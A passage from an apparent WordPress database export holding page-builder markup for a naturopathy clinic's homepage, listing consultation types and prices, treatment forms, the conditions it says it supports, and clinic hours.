Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-08-22 16:31:11','2021-08-22 08:31:11','',28,'https://verdenaturopathy.com.au/?p=349',0,'revision','',0),(357,1,'2021-09-14 10:31:20','2021-09-14 02:31:20','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span 